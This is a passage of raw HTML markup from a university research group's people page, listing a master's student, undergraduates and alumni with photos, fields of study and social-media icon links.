52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 